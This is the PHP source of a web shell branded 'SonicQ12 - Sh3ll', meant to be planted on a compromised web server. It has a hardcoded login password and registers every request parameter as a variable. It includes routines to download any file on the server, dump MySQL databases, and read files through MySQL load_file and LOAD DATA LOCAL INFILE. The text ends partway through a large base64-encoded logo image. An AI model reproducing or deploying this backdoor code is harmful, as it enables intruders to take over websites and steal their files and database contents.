<?php
/////////////////////////////////////////////////////
////////////   Developed by SonicQ12   /////////////
///////////////////////////////////////////////////
error_reporting(!E_ALL);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
session_start();
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
//define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );

foreach(array('_GET','_POST') as $_request) {
    foreach($$_request as $_key => $_value) {
        if ($_key{0} != '_') {
            if (IS_GPC) {
                $_value = s_array($_value);
            }
            $$_key = $_value;
		}
    }
}
/*=================  Info Login  ================*/

$sonic['pass'] = str_rot13(md5(base64_encode(sha1($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_HOST']))));
$admin = array();
$admin['pass']  = 'sonicq12'; // SonicQ12 Pass
$admin['check'] = 1;
$admin['cookiepre'] = '';
$admin['cookiedomain'] = '';
$admin['cookiepath'] = '/';
$admin['cookielife'] = 86400;
/*===============================================*/
if ($charset == 'utf8') {
    header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
    header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
    header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
    header("content-Type: text/html; charset=iso-8859-2");
}



$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];

$timestamp = time();



/*===================== Login =====================*/

if ($action == "logout") {
    scookie('SonicQ12', '', -86400 * 365);
    p('<meta http-equiv="refresh" content="0;URL='.$self.'">');
    p('<body style="background:#000">');
    exit;
}

if($admin['check']){

    if ($_POST['login']) {

        if ($admin['pass'] == $password) {
            scookie('SonicQ12', $password);
            p('<meta http-equiv="refresh" content="2;URL='.$self.'">');
            p('<body style="background:#000"><BR><BR><div align=center><div style="color:#00e400;">Hello SonicQ12<br /><img src=http://i.imgur.com/UwF8H.gif></div></div>');
            exit;
        }
        else{
            echo $err_mess;
        }}
    if ($_SESSION['SonicQ12']) {
        if ($_SESSION['SonicQ12'] != $admin['pass']) {
            loginpage();
        }
    } else {
       loginpage();
    }
}
/*===================== Login =====================*/



$errmsg = '';



if ($action == 'phpinfo') {

    if (IS_PHPINFO) {

        phpinfo();

    } else {

        $errmsg = 'phpinfo() function has non-permissible';

    }

}





if ($doing == 'downfile' && $thefile) {

    if (!@file_exists($thefile)) {

        $errmsg = 'The file you want Downloadable was nonexistent';

    } else {

        $fileinfo = pathinfo($thefile);

        header('Content-type: application/x-'.$fileinfo['extension']);

        header('Content-Disposition: attachment; filename='.$fileinfo['basename']);

        header('Content-Length: '.filesize($thefile));

        @readfile($thefile);

        exit;

    }

}





if ($doing == 'backupmysql' && !$saveasfile) {
    dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
    $table = array_flip($table);
    $result = q("SHOW tables");
    if (!$result) p('<h2>'.mysql_error().'</h2>');
    $filename = basename($_SERVER['HTTP_HOST'].'sql.gz');
    header('Content-type: application/unknown');
    header('Content-Disposition: attachment; filename='.$filename);
    $mysqldata = '';
    while ($currow = mysql_fetch_array($result)) {
        if (isset($table[$currow[0]])) {
            $mysqldata .= sqldumptable($currow[0]);
        }
    }
    mysql_close();
    exit;
}
if($doing=='mysqldown'){
    if (!$dbname) {
        $errmsg = 'Please input dbname';
    } else {
        dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
        if (!file_exists($mysqldlfile)) {
            $errmsg = 'The file you want Downloadable was nonexistent';
        } else {
            $result = q("select load_file('$mysqldlfile');");
            if(!$result){
                q("DROP TABLE IF EXISTS tmp_angel;");
                q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
                q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
                $result = q("select content from tmp_angel");
                q("DROP TABLE tmp_angel");
			}
            $row = @mysql_fetch_array($result);
            if (!$row) {
                $errmsg = 'Load file failed '.mysql_error();
            } else {
                $fileinfo = pathinfo($mysqldlfile);
                header('Content-type: application/x-'.$fileinfo['extension']);
                header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
                header("Accept-Length: ".strlen($row[0]));
                echo $row[0];
                exit;
            }
        }
    }
}
?>

    <html>

    <head>

        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <link rel="icon" href="http://thumbs.dreamstime.com/thumb_411/12455464854iEKQ2.jpg" type="image/x-icon">
        <title><?php echo str_replace('.','','SonicQ12 - Sh3ll');?></title>
        <style type="text/css">

            body,td{font: 10pt Tahoma;color:#f4f4f4;line-height: 16px;}


            img {outline:none;}
            a {color: #00e400;text-decoration:none;}

            a:hover{color: #f00;text-decoration:underline;}

            .alt1 td{border:none; padding:15px 15px 0px 15px;}

            .alt2 td{border-top:1px solid gray;border-bottom:1px solid gray;background:#f9f9f9;padding:5px 10px 5px 5px;}

            .focus td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}

            .fout1 td{border-top:1px solid gray;border-bottom:0px solid gray;background:#0E0E0E;padding:5px 10px 5px 5px;}

            .fout td{border-top:1px solid gray;border-bottom:0px solid gray;background:#000;padding:5px 10px 5px 5px;}

            .head td{border-top:1px solid #00e400;border-bottom:1px solid #00e400;background:#000;padding:5px 10px 5px 5px;font-weight:bold;}

            .head_small td{background:#000;}

            .head td span{font-weight:normal;}

            form{margin:0;padding:0;}

            h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}

            ul.info li{margin:0;color:#444;line-height:24px;height:24px;}

            u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}

            input, textarea, button
            {
                font-size: 9pt;
                color: #ccc;
                font-family: verdana, sans-serif;
                background: #000;
                border: 1px solid #00e400;

            }
            select

            {

                font-size: 8pt;

                font-weight: normal;

                color: #ccc;

                font-family: verdana, sans-serif;

                background-color: #000;

            }

	@-webkit-keyframes sonicq12{
	1% {opacity: 0.0;}
	25% {opacity: 0.3;}
	50% {opacity: 0.1;}
	75% {opacity: 0.7;}
	100 {opacity: 1;}
	}
	

        </style>

        <script type="text/javascript">

            function CheckAll(form) {

                for(var i=0;i<form.elements.length;i++) {

                    var e = form.elements[i];

                    if (e.name != 'chkall')

                        e.checked = form.chkall.checked;

                }

            }

            function $(id) {

                return document.getElementById(id);

            }

            function goaction(act){

                $('goaction').action.value=act;

                $('goaction').submit();

            }

        </script>

    </head>

    <body onLoad="init()" style="margin:0;table-layout:fixed; word-break:break-all" bgcolor=black style="background:#000">





    <div border="0" style="position:fixed; width: 100%; height: 25px; z-index: 1; top: 300px; left: 0;" id="loading" align="center" valign="center">

        <table border="1" width="110px" cellspacing="0" cellpadding="0" style="border-collapse: collapse" bordercolor="#003300">

            <tr>

                <td align="center" valign=center>

                    <div border="1" style="background-color: #0E0E0E; filter: alpha(opacity=70); opacity: .7; width: 110px; height: 25px; z-index: 1; border-collapse: collapse;" bordercolor="#006600"  align="center">

                        Loading<img src="http://i382.photobucket.com/albums/oo263/vnhacker/loading.gif">

                    </div>

                </td>

            </tr>

        </table>

    </div>

    <script>

        var ld=(document.all);

        var ns4=document.layers;

        var ns6=document.getElementById&&!document.all;

        var ie4=document.all;

        if (ns4)

            ld=document.loading;

        else if (ns6)

            ld=document.getElementById("loading").style;

        else if (ie4)

            ld=document.all.loading.style;

        function init()

        {

            if(ns4){ld.visibility="hidden";}

            else if (ns6||ie4) ld.display="none";

        }

    </script>









    <table width="100%" border="0" cellpadding="0" cellspacing="0">

        <tr class="head_small">

            <td  width=100%>

                <table width=100%><tr class="head_small"><td  width="150px">
				<a href="<?php $self;?>"><img style="-webkit-animation: sonicq12 1s infinite" src="data:image/jpg;base64,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